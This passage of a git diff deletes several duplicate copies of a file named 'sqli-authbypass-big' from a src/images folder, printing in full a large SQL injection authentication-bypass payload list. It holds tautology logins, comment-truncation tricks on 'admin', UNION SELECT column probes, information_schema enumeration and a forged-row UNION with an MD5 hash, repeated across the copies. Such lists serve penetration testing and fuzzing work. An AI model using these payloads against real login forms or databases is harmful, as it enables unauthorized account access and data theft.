-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
